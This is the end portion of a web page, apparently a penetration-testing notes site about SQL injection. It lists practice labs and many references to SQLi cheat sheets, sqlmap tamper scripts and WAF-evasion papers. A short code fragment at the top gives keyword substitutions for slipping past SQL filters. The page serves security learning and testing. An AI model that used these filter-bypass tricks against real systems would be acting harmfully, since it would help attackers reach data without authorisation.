<a id="__codelineno-30-3" name="__codelineno-30-3" href="#__codelineno-30-3"></a><span class="o">=</span><span class="w"> </span><span class="o">-&gt;</span><span class="w"> </span><span class="k">LIKE</span><span class="p">,</span><span class="n">REGEXP</span><span class="p">,</span><span class="w"> </span><span class="k">BETWEEN</span><span class="p">,</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="o">&gt;</span>
<a id="__codelineno-30-4" name="__codelineno-30-4" href="#__codelineno-30-4"></a><span class="o">&gt;</span><span class="w"> </span><span class="n">X</span><span class="w"> </span><span class="o">-&gt;</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="k">between</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="n">X</span>
<a id="__codelineno-30-5" name="__codelineno-30-5" href="#__codelineno-30-5"></a><span class="k">WHERE</span><span class="w"> </span><span class="o">-&gt;</span><span class="w"> </span><span class="k">HAVING</span>
</code></pre></div></li>
</ul>
<h2 id="labs">Labs</h2>
<ul>
<li><a href="https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data">SQL injection vulnerability in WHERE clause allowing retrieval of hidden data</a></li>
<li><a href="https://portswigger.net/web-security/sql-injection/lab-login-bypass">SQL injection vulnerability allowing login bypass</a></li>
<li><a href="https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding">SQL injection with filter bypass via XML encoding</a></li>
<li><a href="https://portswigger.net/web-security/all-labs#sql-injection">SQL Labs</a></li>
</ul>
<h2 id="references">References</h2>
<ul>
<li>Detect SQLi</li>
<li><a href="https://gerbenjavado.com/manual-sql-injection-discovery-tips/">Manual SQL Injection Discovery Tips</a></li>
<li><a href="https://sqlwiki.netspi.com/">NetSPI SQL Injection Wiki</a></li>
<li>MySQL:</li>
<li><a href="http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet">PentestMonkey's mySQL injection cheat sheet</a></li>
<li><a href="https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/">Reiners mySQL injection Filter Evasion Cheatsheet</a></li>
<li><a href="https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/">Alternative for Information_Schema.Tables in MySQL</a></li>
<li><a href="https://websec.ca/kb/sql_injection">The SQL Injection Knowledge base</a></li>
<li>MSSQL:</li>
<li><a href="http://evilsql.com/main/page2.php">EvilSQL's Error/Union/Blind MSSQL Cheatsheet</a></li>
<li><a href="http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet">PentestMonkey's MSSQL SQLi injection Cheat Sheet</a></li>
<li>ORACLE:</li>
<li><a href="http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet">PentestMonkey's Oracle SQLi Cheatsheet</a></li>
<li>POSTGRESQL:</li>
<li><a href="http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet">PentestMonkey's Postgres SQLi Cheatsheet</a></li>
<li>Others</li>
<li><a href="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/">SQLi Cheatsheet - NetSparker</a></li>
<li><a href="http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html">Access SQLi Cheatsheet</a></li>
<li><a href="http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet">PentestMonkey's Ingres SQL Injection Cheat Sheet</a></li>
<li><a href="http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet">Pentestmonkey's DB2 SQL Injection Cheat Sheet</a></li>
<li><a href="http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet">Pentestmonkey's Informix SQL Injection Cheat Sheet</a></li>
<li><a href="https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet">SQLite3 Injection Cheat sheet</a></li>
<li><a href="http://rails-sqli.org/">Ruby on Rails (Active Record) SQL Injection Guide</a></li>
<li><a href="http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html">ForkBombers SQLMap Tamper Scripts Update</a></li>
<li><a href="https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/">SQLi in INSERT worse than SELECT</a></li>
<li><a href="https://gerbenjavado.com/manual-sql-injection-discovery-tips/">Manual SQL Injection Tips</a></li>
<li>Second Order:</li>
<li><a href="https://www.notsosecure.com/analyzing-cve-2018-6376/">Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection</a></li>
<li><a href="https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/">Exploiting Second Order SQLi Flaws by using Burp &amp; Custom Sqlmap Tamper</a></li>
<li>Sqlmap:</li>
<li><a href="https://twitter.com/zh4ck/status/972441560875970560">#SQLmap protip @zh4ck</a></li>
<li>WAF:</li>
<li><a href="https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf">SQLi Optimization and Obfuscation Techniques</a> by Roberto Salgado</li>
<li><a href="https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/">A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1-2.1-2M12.5 7v5.2l4 2.4-1 1L11 13V7h1.5M11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2v1.8Z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">January 21, 2024</span>
</span>
</aside>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12Z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "..", "features": ["content.code.copy", "navigation.tracking", "navigation.top"], "search": "../assets/javascripts/workers/search.b8dbb3d2.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../assets/javascripts/bundle.bd41221c.min.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink